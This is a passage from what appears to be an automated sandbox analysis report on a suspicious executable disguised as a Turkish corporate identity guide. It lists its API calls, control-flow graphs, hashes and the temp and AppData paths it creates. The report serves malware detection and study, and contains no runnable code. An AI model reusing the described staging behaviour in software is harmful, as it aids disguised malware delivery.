                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                • String ID: ... %d%%$@
                                                                                                                                                • API String ID: 551687249-3859443358
                                                                                                                                                • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                                                                                                • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 976 40264a-402663 call 402c1f 979 402ac5-402ac8 976->979 980 402669-402670 976->980 981 402ace-402ad4 979->981 982 402672 980->982 983 402675-402678 980->983 982->983 985 4027dc-4027e4 983->985 986 40267e-40268d call 40621a 983->986 985->979 986->985 989 402693 986->989 990 402699-40269d 989->990 991 402732-402735 990->991 992 4026a3-4026be ReadFile 990->992 993 402737-40273a 991->993 994 40274d-40275d call 405e33 991->994 992->985 995 4026c4-4026c9 992->995 993->994 996 40273c-402747 call 405e91 993->996 994->985 1004 40275f 994->1004 995->985 998 4026cf-4026dd 995->998 996->985 996->994 999 4026e3-4026f5 MultiByteToWideChar 998->999 1000 402798-4027a4 call 406201 998->1000 1003 4026f7-4026fa 999->1003 999->1004 1000->981 1007 4026fc-402707 1003->1007 1009 402762-402765 1004->1009 1007->1009 1010 402709-40272e SetFilePointer MultiByteToWideChar 1007->1010 1009->1000 1011 402767-40276c 1009->1011 1010->1007 1014 402730 1010->1014 1012 4027a9-4027ad 1011->1012 1013 40276e-402773 1011->1013 1016 4027ca-4027d6 SetFilePointer 1012->1016 1017 4027af-4027b3 1012->1017 1013->1012 1015 402775-402788 1013->1015 1014->1004 1015->985 1018 40278a-402790 1015->1018 1016->985 1019 4027b5-4027b9 1017->1019 1020 4027bb-4027c8 1017->1020 1018->990 1021 402796 1018->1021 1019->1016 1019->1020 1020->985 1021->985
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                  • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                • String ID: 9
                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                                                                                                • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1022 406624-406644 GetSystemDirectoryW 1023 406646 1022->1023 1024 406648-40664a 1022->1024 1023->1024 1025 40665b-40665d 1024->1025 1026 40664c-406655 1024->1026 1027 40665e-406691 wsprintfW LoadLibraryExW 1025->1027 1026->1025 1028 406657-406659 1026->1028 1028->1027
                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                • wsprintfW.USER32 ref: 00406676
                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1029 4057f1-40583c CreateDirectoryW 1030 405842-40584f GetLastError 1029->1030 1031 40583e-405840 1029->1031 1032 405869-40586b 1030->1032 1033 405851-405865 SetFileSecurityW 1030->1033 1031->1032 1033->1031 1034 405867 GetLastError 1033->1034 1034->1032
                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                • API String ID: 3449924974-3370423016
                                                                                                                                                • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1035 405ddf-405deb 1036 405dec-405e20 GetTickCount GetTempFileNameW 1035->1036 1037 405e22-405e24 1036->1037 1038 405e2f-405e31 1036->1038 1037->1036 1039 405e26 1037->1039 1040 405e29-405e2c 1038->1040 1039->1040
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,771A3420,004035D9), ref: 00405E18
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                • String ID: "C:\Users\user\Desktop\DHRI_kurumsal_kimlik_rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                • API String ID: 1716503409-770099200
                                                                                                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1041 704d1777-704d17b6 call 704d1b5f 1045 704d17bc-704d17c0 1041->1045 1046 704d18d6-704d18d8 1041->1046 1047 704d17c9-704d17d6 call 704d2394 1045->1047 1048 704d17c2-704d17c8 call 704d2352 1045->1048 1053 704d17d8-704d17dd 1047->1053 1054 704d1806-704d180d 1047->1054 1048->1047 1057 704d17df-704d17e0 1053->1057 1058 704d17f8-704d17fb 1053->1058 1055 704d182d-704d1831 1054->1055 1056 704d180f-704d182b call 704d2569 call 704d15b4 call 704d1272 GlobalFree 1054->1056 1059 704d187e-704d1884 call 704d2569 1055->1059 1060 704d1833-704d187c call 704d15c6 call 704d2569 1055->1060 1081 704d1885-704d1889 1056->1081 1063 704d17e8-704d17e9 call 704d2aac 1057->1063 1064 704d17e2-704d17e3 1057->1064 1058->1054 1061 704d17fd-704d17fe call 704d2d37 1058->1061 1059->1081 1060->1081 1074 704d1803 1061->1074 1077 704d17ee 1063->1077 1069 704d17e5-704d17e6 1064->1069 1070 704d17f0-704d17f6 call 704d2724 1064->1070 1069->1054 1069->1063 1080 704d1805 1070->1080 1074->1080 1077->1074 1080->1054 1084 704d188b-704d1899 call 704d252c 1081->1084 1085 704d18c6-704d18cd 1081->1085 1091 704d189b-704d189e 1084->1091 1092 704d18b1-704d18b8 1084->1092 1085->1046 1087 704d18cf-704d18d0 GlobalFree 1085->1087 1087->1046 1091->1092 1094 704d18a0-704d18a8 1091->1094 1092->1085 1093 704d18ba-704d18c5 call 704d153d 1092->1093 1093->1085 1094->1092 1096 704d18aa-704d18ab FreeLibrary 1094->1096 1096->1092
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 704D1B5F: GlobalFree.KERNEL32(?), ref: 704D1DB2
                                                                                                                                                  • Part of subcall function 704D1B5F: GlobalFree.KERNEL32(?), ref: 704D1DB7
                                                                                                                                                  • Part of subcall function 704D1B5F: GlobalFree.KERNEL32(?), ref: 704D1DBC
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D1825
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 704D18AB
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D18D0
                                                                                                                                                  • Part of subcall function 704D2352: GlobalAlloc.KERNEL32(00000040,?), ref: 704D2383
                                                                                                                                                  • Part of subcall function 704D2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,704D17F6,00000000), ref: 704D27F4
                                                                                                                                                  • Part of subcall function 704D15C6: wsprintfW.USER32 ref: 704D15F4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                                                • Opcode ID: 79c5c64c63b7b10e1b863bde4cecb85b0245f2acd46585db3d6aaa3d13e38cf7
                                                                                                                                                • Instruction ID: 782753b6a42b62fd4bba53dad2a78e1e598f499ac1611df76fdc0aa54bb3f104
                                                                                                                                                • Opcode Fuzzy Hash: 79c5c64c63b7b10e1b863bde4cecb85b0245f2acd46585db3d6aaa3d13e38cf7
                                                                                                                                                • Instruction Fuzzy Hash: 1141BD72500244BACB11EF70E9A5B8E37B8AB05315F144079FF079A3A6DBBC9584D760
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1098 4023e4-402415 call 402c41 * 2 call 402cd1 1105 402ac5-402ad4 1098->1105 1106 40241b-402425 1098->1106 1108 402427-402434 call 402c41 lstrlenW 1106->1108 1109 402438-40243b 1106->1109 1108->1109 1112 40243d-40244e call 402c1f 1109->1112 1113 40244f-402452 1109->1113 1112->1113 1116 402463-402477 RegSetValueExW 1113->1116 1117 402454-40245e call 403116 1113->1117 1120 402479 1116->1120 1121 40247c-40255d RegCloseKey 1116->1121 1117->1116 1120->1121 1121->1105 1123 40288b-402892 1121->1123 1123->1105
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp
                                                                                                                                                • API String ID: 2655323295-1160754989
                                                                                                                                                • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                                                                                                • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$Enum
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 464197530-0
                                                                                                                                                • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,771A3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,771A3420,00000000), ref: 00405C48
                                                                                                                                                  • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                  • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                  • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146, xrefs: 00401640
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146
                                                                                                                                                • API String ID: 1892508949-3016365613
                                                                                                                                                • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                                                                                                • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                  • Part of subcall function 0040427D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
